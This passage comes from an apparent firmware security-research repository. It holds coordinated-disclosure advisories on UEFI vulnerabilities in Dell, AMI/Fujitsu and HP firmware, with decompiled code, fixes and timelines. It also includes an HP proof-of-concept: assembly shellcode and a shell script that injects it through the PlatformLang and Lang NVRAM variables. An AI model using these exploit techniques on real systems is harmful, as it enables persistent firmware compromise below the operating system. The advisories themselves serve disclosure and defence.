AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Dell firmware with confirmed impact by Binarly team 16 | 17 | | Product | Firmware version | CPU | Module name | Module GUID | Module SHA256 | 18 | | --- | --- | --- | --- | --- | --- | 19 | | OptiPlex 7080 | 0.1.16.0 | Intel | 0A1C30D2-7821-4FD2-B3C1-D24FA4C84B6A | 0a1c30d2-7821-4fd2-b3c1-d24fa4c84b6a | f8d98000b805e8f2bae1fb8d9377020ff0beff3fbb237c972079e0be439ef60e | 20 | 21 | 22 | ## Potential impact 23 | 24 | An attacker with high local access can exploit this vulnerability to read the contents of stack memory or global memory. This information could help with exploitation of other vulnerabilities in DXE to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | Let's take OptiPlex 7080's firmware (version: 0.1.16.0, module sha256: f8d98000b805e8f2bae1fb8d9377020ff0beff3fbb237c972079e0be439ef60e) as an example. 29 | 30 | The following code in the module actually allows leaking memory: 31 | 32 | * a call to a `gRT->GetVariable()` offset: `0x880` 33 | * a call to a `gRT->SetVariable()` offset: `0x8bf` 34 | 35 | ```c++ 36 | __int64 __fastcall sub_7CC(__int64 a1, EFI_SYSTEM_TABLE *SystemTable) 37 | { 38 | __int64 v2; // rbx 39 | __int64 v3; // r8 40 | __int64 v5; // [rsp+30h] [rbp-20h] BYREF 41 | _DWORD v6[6]; // [rsp+38h] [rbp-18h] BYREF 42 | __int64 v7; // [rsp+60h] [rbp+10h] BYREF 43 | unsigned int v8; // [rsp+70h] [rbp+20h] BYREF 44 | __int64 v9; // [rsp+78h] [rbp+28h] BYREF 45 | 46 | v7 = a1; 47 | v2 = 0i64; 48 | v6[0] = -2117640072; 49 | v9 = 0i64; 50 | v6[1] = 1130938334; 51 | v6[2] = 156733591; 52 | v6[3] = 1696251924; 53 | if ( !gST_0 ) 54 | { 55 | gST_0 = SystemTable; 56 | gBS_0 = SystemTable->BootServices; 57 | gRT = SystemTable->RuntimeServices; 58 | } 59 | if ( sub_8D4(a1) ) 60 | { 61 | v9 = 0i64; 62 | (gBS_0->InstallProtocolInterface)(&v9, &AMI_SETUP_NVRAM_UPDATE_GUID, 0i64, 0i64); 63 | v5 = 4i64; 64 | if ( (gRT->GetVariable)(L"AmiHardwareSignatureSetupUpdateCountVar", v6, &v8, &v5, &v7) >= 0 ) 65 | { 66 | LODWORD(v2) = v7; 67 | v3 = v8; 68 | } 69 | else 70 | { 71 | v3 = 7i64; 72 | v8 = 7; 73 | } 74 | LODWORD(v7) = v2 + 1; 75 | return (gRT->SetVariable)(L"AmiHardwareSignatureSetupUpdateCountVar", v6, v3, v5, &v7); 76 | } 77 | return v2; 78 | } 79 | 80 | ``` 81 | 82 | The `gRT->SetVariable()` service is called with the `DataSize` as an argument, which will be overwritten inside the `gRT->GetVariable()` service if the length of `AmiHardwareSignatureSetupUpdateCountVar` NVRAM variable is greater than `4`. 83 | 84 | Thus, a potential attacker can dump `X - 4` bytes from the stack (or global memory) into AmiHardwareSignatureSetupUpdateCountVar NVRAM variable by setting `AmiHardwareSignatureSetupUpdateCountVar` NVRAM variable's size to `X > 4`. 85 | 86 | To fix this vulnerability the `DataSize` must be re-initialized with the size of `AmiHardwareSignatureSetupUpdateCountVar` before calling `gRT->SetVariable()`. 87 | 88 | ## Disclosure timeline 89 | 90 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 91 | 92 | | Disclosure Activity | Date (YYYY-mm-dd) | 93 | | --- | --- | 94 | | Dell PSIRT is notified | 2022-12-29 | 95 | | AMI PSIRT assigned CVE number | 2023-08-14 | 96 | | AMI PSIRT provide patch release | 2023-09-12 | 97 | | BINARLY public disclosure date | 2023-09-21 | 98 | 99 | ## Acknowledgements 100 | 101 | **BINARLY efiXplorer team** 102 | -------------------------------------------------------------------------------- /AMI/BRLY-DVA-2023-027.md: -------------------------------------------------------------------------------- 1 | # [BRLY-DVA-2023-027] 2 | 3 | _This vulnerability was detected by the Deep Vulnerability Analysis (DVA) component from Binarly Platform_ 4 | 5 | # SMM arbitrary code execution vulnerability in SMM module on Fujitsu device. 6 | 7 | ## Summary 8 | 9 | **BINARLY efiXplorer team** has discovered an SMM arbitrary code execution vulnerability on a Fujitsu device allowing a potential attacker to hijack execution flow of code running in the System Management Mode. Exploitation of this issue could lead to escalation of privileges to SMM. 10 | 11 | ## Vulnerability Information 12 | 13 | - BINARLY internal vulnerability identifier: BRLY-DVA-2023-027 14 | - Fujitsu PSIRT assigned CVE identifier: - 15 | - AMI PSIRT assigned CVE identifier: - 16 | - CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 17 | 18 | ## Affected Fujitsu firmware images with confirmed impact by BINARLY team 19 | 20 | The vulnerability was originally discovered on Fujitsu device mentioned below, however later it was confirmed by AMI PSIRT this issue is inside AMI's product. 21 | 22 | | Device name | Unpacked firmware SHA256 | Firmware version | IBV | Module name | Module GUID | Module SHA256 | Module kind | 23 | | ------------------ | ---------------------------------------------------------------- | ---------------- | --- | ----------- | ------------------------------------ | ---------------------------------------------------------------- | ----------- | 24 | | AU47 M1 | d3715136d50fc486ef59fb4aee1d7f06552fdf98423809939538fe905a1aa0b3 | V5.0.0.8-R1.40.0 | AMI | SmmRuntime | 7c79ac8c-5e6c-4e3d-ba6f-c260ee7c172e | 1be4cbba75688e77901f12cbe9964c69421ec13cc0493f12df2fc339e4b77a5d | SmmModule | 25 | | PRIMERGY RX4770 M2 | 083adc7cc324137950b4bc36308340e3b60b14ab97b7d967f33168930de4973c | V5.0.0.9-R1.20.0 | AMI | SmmRuntime | 7c79ac8c-5e6c-4e3d-ba6f-c260ee7c172e | 23c3e456e964e0667c2e17794c8b95715701ccdc5926cad4c86387f925c26b08 | SmmModule | 26 | 27 | ## Potential impact 28 | 29 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into BIOS. Such a malicious firmware code in BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by malicious actors to bypass security mechanisms provided by UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 30 | 31 | ## Vulnerability description 32 | 33 | Let's consider the vulnerability on the example of a module with SHA256 `d3715136d50fc486ef59fb4aee1d7f06552fdf98423809939538fe905a1aa0b3`. 34 | The pseudocode of the vulnerable `ChildSwSmiHandler` function (with the `HandlerType`: `EFI_SMM_RUNTIME_PROTOCOL_GUID`) is presented below: 35 | 36 | ```c 37 | EFI_STATUS __fastcall ChildSwSmiHandler( 38 | EFI_HANDLE DispatchHandle, 39 | const void *Context, 40 | char *CommBuffer, 41 | UINTN *CommBufferSize) 42 | { 43 | __int64 Ptr; // [rsp+20h] [rbp-18h] 44 | 45 | Ptr = *(CommBuffer + 4); 46 | if ( Ptr ) 47 | { 48 | (*(Ptr + 8))(*Ptr, gSmst, CommBuffer + 24); // Arbitrary function call 49 | *(CommBuffer + 4) = 0; 50 | } 51 | return EFI_SUCCESS; 52 | } 53 | ``` 54 | 55 | As we can see from the pseucode, since a possible attacker controls the contents of `СommBuffer`, it allows to specify an arbitrary pointer of a function called here `(*(Ptr + 8))(*Ptr, gSmst, CommBuffer + 24)`. Which will lead to hijacking of the execution flow. 56 | 57 | To fix this vulnerability, a call to an arbitrary function must be removed and replaced by a call the function from a table that is already located in SMRAM. 58 | 59 | ## Disclosure timeline 60 | 61 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 62 | 63 | | Disclosure Activity | Date | 64 | | ------------------------------ | ---------- | 65 | | Fujitsu PSIRT is notified | 2023-12-22 | 66 | | BINARLY public disclosure date | 2024-05-15 | 67 | 68 | ## Acknowledgements 69 | 70 | **BINARLY efiXplorer team** 71 | -------------------------------------------------------------------------------- /AMI/BRLY-DVA-2023-028.md: -------------------------------------------------------------------------------- 1 | # [BRLY-DVA-2023-028] 2 | 3 | _This vulnerability was detected by the Deep Vulnerability Analysis (DVA) component from Binarly Platform_ 4 | 5 | # SMM memory corruption vulnerability in SMM module on Fujitsu device (SMRAM write). 6 | 7 | ## Summary 8 | 9 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability in a Fujitsu device allowing a possible attacker to write fixed or predictable data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 10 | 11 | ## Vulnerability Information 12 | 13 | - BINARLY internal vulnerability identifier: BRLY-DVA-2023-028 14 | - Fujitsu PSIRT assigned CVE identifier: - 15 | - AMI PSIRT assigned CVE identifier: - 16 | - CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 17 | 18 | ## Affected AMI-based Fujitsu firmware images with confirmed impact by BINARLY team 19 | 20 | The vulnerability was originally discovered on Fujitsu device mentioned below, however later it was confirmed by AMI PSIRT this issue is inside AMI's product. 21 | 22 | | Device name | Unpacked firmware SHA256 | Firmware version | IBV | Module name | Module GUID | Module SHA256 | Module kind | 23 | | ------------------ | ---------------------------------------------------------------- | ---------------- | --- | ----------- | ------------------------------------ | ---------------------------------------------------------------- | ----------- | 24 | | AU47 M1 | d3715136d50fc486ef59fb4aee1d7f06552fdf98423809939538fe905a1aa0b3 | V5.0.0.8-R1.40.0 | AMI | SmmRuntime | 7c79ac8c-5e6c-4e3d-ba6f-c260ee7c172e | 1be4cbba75688e77901f12cbe9964c69421ec13cc0493f12df2fc339e4b77a5d | SmmModule | 25 | | PRIMERGY RX4770 M2 | 083adc7cc324137950b4bc36308340e3b60b14ab97b7d967f33168930de4973c | V5.0.0.9-R1.20.0 | AMI | SmmRuntime | 7c79ac8c-5e6c-4e3d-ba6f-c260ee7c172e | 23c3e456e964e0667c2e17794c8b95715701ccdc5926cad4c86387f925c26b08 | SmmModule | 26 | 27 | ## Potential impact 28 | 29 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into BIOS. Such a malicious firmware code in BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by malicious actors to bypass security mechanisms provided by UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 30 | 31 | ## Vulnerability description 32 | 33 | Let's consider the vulnerability on the example of a module with SHA256 `d3715136d50fc486ef59fb4aee1d7f06552fdf98423809939538fe905a1aa0b3`. 34 | The pseudocode of the vulnerable `ChildSwSmiHandler` function (with the `HandlerType`: `EFI_SMM_RUNTIME_PROTOCOL_GUID`) is presented below: 35 | 36 | ```c 37 | EFI_STATUS __fastcall ChildSwSmiHandler( 38 | EFI_HANDLE DispatchHandle, 39 | const void *Context, 40 | char *CommBuffer, 41 | UINTN *CommBufferSize) 42 | { 43 | __int64 Ptr; // [rsp+20h] [rbp-18h] 44 | 45 | Ptr = *(CommBuffer + 4); 46 | if ( Ptr ) 47 | { 48 | (*(Ptr + 8))(*Ptr, gSmst, CommBuffer + 24); 49 | *((_QWORD *)CommBuffer + 4) = 0; // Arbitrary write (*CommBufferSize is not checked) 50 | } 51 | return EFI_SUCCESS; 52 | } 53 | ``` 54 | 55 | As we can see, input Communication Buffer is not validated to be outside of SMRAM since the Communication Buffer size (`*CommBufferSize`) is not checked to be valid (not `0` or equal to any fixed expectable value) for relying on the validation implemented in `PiSmmCommunicationSmm` module (based on a Communication Header). 56 | 57 | In this way, a potential attacker can point `CommBuffer` just before SMRAM and set `*CommBufferSize` to 1 in order to pass validation in `PiSmmCommunicationSmm` and corrupt SMRAM (from `SMRAM_BASE` to `SMRAM_BASE + 39`). 58 | 59 | In order to fix this vulnerability, check for `*CommBufferSize` should be added: 60 | 61 | ```c 62 | if (*CommBufferSize < sizeof(COMM_BUFFER_STRUCT)) { 63 | // Error 64 | } 65 | ``` 66 | 67 | ## Disclosure timeline 68 | 69 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 70 | 71 | | Disclosure Activity | Date | 72 | | ------------------------------ | ---------- | 73 | | Fujitsu PSIRT is notified | 2023-12-22 | 74 | | BINARLY public disclosure date | 2024-05-15 | 75 | 76 | ## Acknowledgements 77 | 78 | **BINARLY efiXplorer team** 79 | -------------------------------------------------------------------------------- /Dell/BRLY-2022-131.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-131] 2 | 3 | # Memory contents leak / information disclosure vulnerability in DXE driver on Dell platform. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a memory contents leak / information disclosure vulnerability that allows a potential attacker to dump stack memory or global memory into an NVRAM variable. This in turn could help building a successful attack vector based on exploiting a memory corruption vulnerability. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-131 12 | * Dell PSIRT assigned CVE identifier: CVE-2023-28042 13 | * DSA identifier: [DSA-2023-099](https://www.dell.com/support/kbdoc/en-us/000212204/dsa-2023-099-dell-client-bios-security-update-for-multiple-improper-input-validation-vulnerabilities) 14 | * CVSS v3.1: 6.0 Medium AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 15 | 16 | ## Affected Dell firmware with confirmed impact by Binarly team 17 | 18 | | Product | Firmware version | CPU | Module name | Module GUID | Module SHA256 | 19 | | --- | --- | --- | --- | --- | --- | 20 | | Precision 3240 Compact | 0.1.15.0 | Intel | 534DB6EE-FEBD-4F63-9C1F-8425CA82C6E1 | 534db6ee-febd-4f63-9c1f-8425ca82c6e1 | 59f51092b44581ea5525d187d17b176c700057900475cbc552f68e1999f5eaf4 | 21 | 22 | 23 | ## Potential impact 24 | 25 | An attacker with high local access can exploit this vulnerability to read the contents of stack memory or global memory. This information could help with exploitation of other vulnerabilities in DXE to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 26 | 27 | ## Vulnerability description 28 | 29 | Let's take Precision 3240 Compact's firmware (version: 0.1.15.0, module sha256: 59f51092b44581ea5525d187d17b176c700057900475cbc552f68e1999f5eaf4) as an example. 30 | 31 | The following code in the module actually allows leaking memory: 32 | 33 | * a call to a `gRT->GetVariable()` offset: `0x716` 34 | * a call to a `gRT->SetVariable()` offset: `0x760` 35 | 36 | ```c++ 37 | char __fastcall sub_6B8(unsigned int a1) 38 | { 39 | unsigned int v2; // ebx 40 | char result; // al 41 | EFI_GUID VendorGuid; // [rsp+30h] [rbp-10h] BYREF 42 | bool Data; // [rsp+58h] [rbp+18h] BYREF 43 | UINTN DataSize; // [rsp+60h] [rbp+20h] BYREF 44 | 45 | VendorGuid.Data1 = -1954858115; 46 | *&VendorGuid.Data2 = 1210466085; 47 | *VendorGuid.Data4 = 365057174; 48 | *&VendorGuid.Data4[4] = 845990413; 49 | Data = 0; 50 | DataSize = 1i64; 51 | if ( (gRT->GetVariable(L"EfiExternalGfxState", &VendorGuid, 0i64, &DataSize, &Data) & 0x8000000000000000ui64) != 0i64 ) 52 | { 53 | if ( sub_630() ) 54 | { 55 | Data = 1; 56 | v2 = 240; 57 | } 58 | else 59 | { 60 | Data = 0; 61 | v2 = 180; 62 | } 63 | gRT->SetVariable( // <= second call 64 | L"EfiExternalGfxState", 65 | &VendorGuid, 66 | 7u, 67 | DataSize, 68 | &Data); 69 | if ( a1 < v2 ) 70 | __outbyte(0xCF9u, 6u); 71 | } 72 | result = sub_630(); 73 | if ( Data != (result != 0) ) 74 | { 75 | Data = result != 0; 76 | (gRT->SetVariable)(L"EfiExternalGfxState", &VendorGuid, 7i64, DataSize, &Data); 77 | result = 6; 78 | __outbyte(0xCF9u, 6u); 79 | } 80 | return result; 81 | } 82 | 83 | ``` 84 | 85 | The `gRT->SetVariable()` service is called with the `DataSize` as an argument, which will be overwritten inside the `gRT->GetVariable()` service if the length of `EfiExternalGfxState` NVRAM variable is greater than `1`. 86 | 87 | Thus, a potential attacker can dump `X - 1` bytes from the stack (or global memory) into EfiExternalGfxState NVRAM variable by setting `EfiExternalGfxState` NVRAM variable's size to `X > 1`. 88 | 89 | To fix this vulnerability the `DataSize` must be re-initialized with the size of `EfiExternalGfxState` before calling `gRT->SetVariable()`. 90 | 91 | ## Disclosure timeline 92 | 93 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 94 | 95 | | Disclosure Activity | Date (YYYY-mm-dd) | 96 | | --- | --- | 97 | | Dell PSIRT is notified | 2022-12-29 | 98 | | Dell PSIRT confirmed reported issue | 2023-03-16 | 99 | | Dell PSIRT assigned CVE number | 2023-06-15 | 100 | | Dell PSIRT provide patch release | 2023-06-15 | 101 | | BINARLY public disclosure date | 2023-06-21 | 102 | 103 | ## Acknowledgements 104 | 105 | **BINARLY efiXplorer team** 106 | -------------------------------------------------------------------------------- /Dell/BRLY-2022-158.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-158] 2 | 3 | # Memory contents leak / information disclosure vulnerability in DXE driver on Dell platform. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a memory contents leak / information disclosure vulnerability that allows a potential attacker to dump stack memory or global memory into an NVRAM variable. This in turn could help building a successful attack vector based on exploiting a memory corruption vulnerability. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-158 12 | * Dell PSIRT assigned CVE identifier: CVE-2023-28059 13 | * DSA identifier: [DSA-2023-099](https://www.dell.com/support/kbdoc/en-us/000212204/dsa-2023-099-dell-client-bios-security-update-for-multiple-improper-input-validation-vulnerabilities) 14 | * CVSS v3.1: 4.9 Medium AV:P/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 15 | 16 | ## Affected Dell firmware with confirmed impact by Binarly team 17 | 18 | | Product | Firmware version | CPU | Module name | Module GUID | Module SHA256 | 19 | | --- | --- | --- | --- | --- | --- | 20 | | Inspiron 3020 | 0.1.0.0 | Intel | LaunchPad3Drv | 1c675c27-6fb1-4170-94e7-3dffe8beadba | 9f5a54f9d0c27666478c65e18a16f306190cf3dee18c3d4f98b528722f330601 | 21 | 22 | 23 | ## Potential impact 24 | 25 | An attacker with high physical access can exploit this vulnerability to read the contents of stack memory or global memory. This information could help with exploitation of other vulnerabilities in DXE to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 26 | 27 | ## Vulnerability description 28 | 29 | Let's take Inspiron 3020's firmware (version: 0.1.0.0, module sha256: 9f5a54f9d0c27666478c65e18a16f306190cf3dee18c3d4f98b528722f330601) as an example. 30 | 31 | The following code in the module actually allows leaking memory: 32 | 33 | * a call to a `gRT->GetVariable()` offset: `0x1413` 34 | * a call to a `gRT->SetVariable()` offset: `0x1442` 35 | 36 | ```c++ 37 | __int64 __fastcall sub_13D4() 38 | { 39 | signed __int64 v0; // rbx 40 | EFI_EVENT Event; // [rsp+40h] [rbp+10h] BYREF 41 | UINTN DataSize; // [rsp+48h] [rbp+18h] BYREF 42 | 43 | Event = 0i64; 44 | DataSize = 8i64; 45 | gRT->GetVariable( // <= first call (we can rewrite DataSize here) 46 | (CHAR16 *)L"BIQ_BOOT_INTERRUPTION", 47 | &VendorGuid, 48 | 0i64, 49 | &DataSize, 50 | &Event); 51 | Event = (char *)Event + 1; 52 | gRT->SetVariable( // <= second call 53 | (CHAR16 *)L"BIQ_BOOT_INTERRUPTION", 54 | &VendorGuid, 55 | 3u, 56 | DataSize, 57 | &Event); 58 | v0 = sub_14D4(); 59 | if ( v0 >= 0 ) 60 | { 61 | if ( byte_155A0 ) 62 | { 63 | return sub_3F04(); 64 | } 65 | else 66 | { 67 | Event = 0i64; 68 | v0 = gBS->CreateEventEx(0x200u, 8ui64, nullsub_1, 0i64, &VariableGuid, &Event); 69 | if ( v0 >= 0 ) 70 | { 71 | v0 = gBS->SignalEvent(Event); 72 | gBS->CloseEvent(Event); 73 | } 74 | } 75 | } 76 | return v0; 77 | } 78 | 79 | ``` 80 | 81 | The `gRT->SetVariable()` service is called with the `DataSize` as an argument, which will be overwritten inside the `gRT->GetVariable()` service if the length of `BIQ_BOOT_INTERRUPTION` NVRAM variable is greater than `8`. 82 | 83 | Thus, a potential attacker can dump `X - 8` bytes from the stack (or global memory) into BIQ_BOOT_INTERRUPTION NVRAM variable by setting `BIQ_BOOT_INTERRUPTION` NVRAM variable's size to `X > 8`. 84 | 85 | To fix this vulnerability the `DataSize` must be re-initialized with the size of `BIQ_BOOT_INTERRUPTION` before calling `gRT->SetVariable()`. 86 | 87 | ## Disclosure timeline 88 | 89 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 90 | 91 | | Disclosure Activity | Date (YYYY-mm-dd) | 92 | | --- | --- | 93 | | Dell PSIRT is notified | 2022-12-29 | 94 | | Dell PSIRT confirmed reported issue | 2023-03-16 | 95 | | Dell PSIRT assigned CVE number | 2023-06-15 | 96 | | Dell PSIRT provide patch release | 2023-06-15 | 97 | | BINARLY public disclosure date | 2023-06-21 | 98 | 99 | ## Acknowledgements 100 | 101 | **BINARLY efiXplorer team** 102 | -------------------------------------------------------------------------------- /HP/BRLY-2021-003-PoC/0138.tar.bz2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binarly-io/Vulnerability-REsearch/d187a2568cf00c5d328f33aa73bd1e8a72c45293/HP/BRLY-2021-003-PoC/0138.tar.bz2 -------------------------------------------------------------------------------- /HP/BRLY-2021-003-PoC/code.asm: -------------------------------------------------------------------------------- 1 | use64 2 | 3 | ; gST->ConOut->SetAttribute)(gST->ConOut, EFI_GREEN); 4 | mov rax, 0x79ee018 5 | mov rdx, 0x002 6 | mov r8, [rax+40h] 7 | mov rcx, r8 8 | call qword [r8+28h] 9 | 10 | ; gST->ConOut->OutputString)(gST->ConOut, message); 11 | mov rax, 0x79ee018 12 | mov rdx, 0x7e9e741 13 | mov r8, [rax+40h] 14 | mov rcx, r8 15 | call qword [r8+8] 16 | 17 | ; jump self 18 | jmp short $-2 19 | nop 20 | nop 21 | nop 22 | nop 23 | nop 24 | 25 | ; message ("Greetings from efiXplorer!") 26 | db 0x47, 0x00, 0x72, 0x00, 0x65, 0x00, 0x65, 0x00 27 | db 0x74, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x67, 0x00 28 | db 0x73, 0x00, 0x20, 0x00, 0x66, 0x00, 0x72, 0x00 29 | db 0x6f, 0x00, 0x6d, 0x00, 0x20, 0x00, 0x65, 0x00 30 | db 0x66, 0x00, 0x69, 0x00, 0x58, 0x00, 0x70, 0x00 31 | db 0x6c, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x65, 0x00 32 | db 0x72, 0x00, 0x21, 0x00 33 | -------------------------------------------------------------------------------- /HP/BRLY-2021-003-PoC/readme.md: -------------------------------------------------------------------------------- 1 | PoC for `CVE-2021-39297` ([BRLY-2021-003](https://github.com/binarly-io/Vulnerability-REsearch/blob/main/HP/BRLY-2021-003.md)) 2 | -------------------------------------------------------------------------------- /HP/BRLY-2021-003-PoC/rsrc/poc_604c4ac862ab8e21d73f3df3977bd09c.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binarly-io/Vulnerability-REsearch/d187a2568cf00c5d328f33aa73bd1e8a72c45293/HP/BRLY-2021-003-PoC/rsrc/poc_604c4ac862ab8e21d73f3df3977bd09c.gif -------------------------------------------------------------------------------- /HP/BRLY-2021-003-PoC/setvars.nsh: -------------------------------------------------------------------------------- 1 | setvar PlatformLang =4141414141414141424141414141414143414141414141414441414141414141454141414141414110e7e90700000000b818e09e07ba020000004c8b40404c89c141ff5028b818e09e07ba41e7e9074c8b40404c89c141ff5008ebfc90909090904700720065006500740069006e00670073002000660072006f006d002000650066006900580070006c006f00720065007200210000 2 | setvar Lang =4141414141414141424141414141414143414141414141414441414141414141454141414141414110e7e90700000000b818e09e07ba020000004c8b40404c89c141ff5028b818e09e07ba41e7e9074c8b40404c89c141ff5008ebfc90909090904700720065006500740069006e00670073002000660072006f006d002000650066006900580070006c006f00720065007200210000 3 | dmpstore PlatformLang 4 | dmpstore Lang 5 | -------------------------------------------------------------------------------- /HP/BRLY-2021-005-PoC/readme.md: -------------------------------------------------------------------------------- 1 | PoC for `CVE-2021-39299` (`BRLY-2021-005`) 2 | 3 | ![brly-2021-005.png](rsrc/brly-2021-005.png) 4 | -------------------------------------------------------------------------------- /HP/BRLY-2021-005-PoC/rsrc/brly-2021-005.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binarly-io/Vulnerability-REsearch/d187a2568cf00c5d328f33aa73bd1e8a72c45293/HP/BRLY-2021-005-PoC/rsrc/brly-2021-005.png -------------------------------------------------------------------------------- /HP/BRLY-2021-038.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-038] 2 | 3 | # The heap buffer overflow vulnerability in child SW SMI handler on multiple HP devices. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a heap buffer overflow vulnerability in the child SW SMI handler on multiple HP devices that allows heap data corruption. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-038 12 | * HP PSIRT assigned CVE identifier: [CVE-2022-23930](https://support.hp.com/us-en/document/ish_5817864-5817896-16) 13 | * CERT/CC assigned case number: VU#683814 14 | * CVSS v3.1 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected HP firmware with confirmed impact by Binarly team 17 | 18 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [Device](https://support.hp.com/us-en/drivers/selfservice/hp-prodesk-405-g6-small-form-factor-pc/38230306) / firmware version: `02.05.01 Rev.A` | 0193 | 40b09ebb66f7bf702edaaccb08a3f4a5ae96d1f08e1b14cb33b9341d6539fee2 | 12D06948-6569-42C9-ABA3-E12BACE7B234 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into BIOS. Such a malicious firmware code in BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by malicious actors to bypass security mechanisms provided by UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in child the SW SMI handler registered with GUID `4dd19464-68d5-4c6d-9a6f-a6049afed855` and located at offset `0x19A0` in the driver. 29 | 30 | It should be noted, that the `HandlerType` is a stack variable in this case: 31 | 32 | ``` 33 | .text:000000000000160D mov [rbp+HandlerType.Data1], 4DD19464h 34 | .text:0000000000001614 ... 35 | .text:000000000000161B mov dword ptr [rbp+HandlerType.Data2], 4C6D68D5h 36 | .text:0000000000001622 mov dword ptr [rbp+HandlerType.Data4], 4A66F9Ah 37 | .text:0000000000001629 mov dword ptr [rbp+HandlerType.Data4+4], 55D8FE9Ah 38 | ``` 39 | 40 | The pseudocode for this handler is shown below: 41 | 42 | ```c++ 43 | EFI_STATUS __fastcall SmiHandler_19A0( 44 | EFI_HANDLE DispatchHandle, 45 | const void *Context, 46 | void *CommBuffer, 47 | UINTN *CommBufferSize) 48 | { 49 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 50 | 51 | ... 52 | // size not validated, we can allocate small buffer, then write out of bounds 53 | CommBufferCopy = (unsigned __int64 *)GetCopy(*CommBufferSize, CommBuffer); 54 | if ( CommBufferCopy ) 55 | { 56 | ... 57 | *((_QWORD *)CommBufferCopy + 2) = Status; // OOB write 58 | CopyMemS(CommBuffer, *CommBufferSize, CommBufferCopy, *CommBufferSize); 59 | Clear(&CommBufferCopy1, *CommBufferSize); 60 | } 61 | return 0; 62 | } 63 | ``` 64 | 65 | `GetCopy` will allocate a buffer of size `*CommBufferSize` and copy the contents of the `CommBuffer` into this buffer: 66 | 67 | ```c++ 68 | void *__fastcall GetCopy(UINTN Size, const void *Buffer) 69 | { 70 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 71 | 72 | result = AllocatePool(Size); // gSmst->SmmAllocatePool wrapper 73 | if ( result && Size && result != Buffer ) 74 | return CopyMem(result, Buffer, Size); 75 | return result; 76 | } 77 | ``` 78 | 79 | It means that `CommBufferCopy` is a pointer to a buffer on the heap with the size `*CommBufferSize`. 80 | `*CommBufferSize` not validated in the 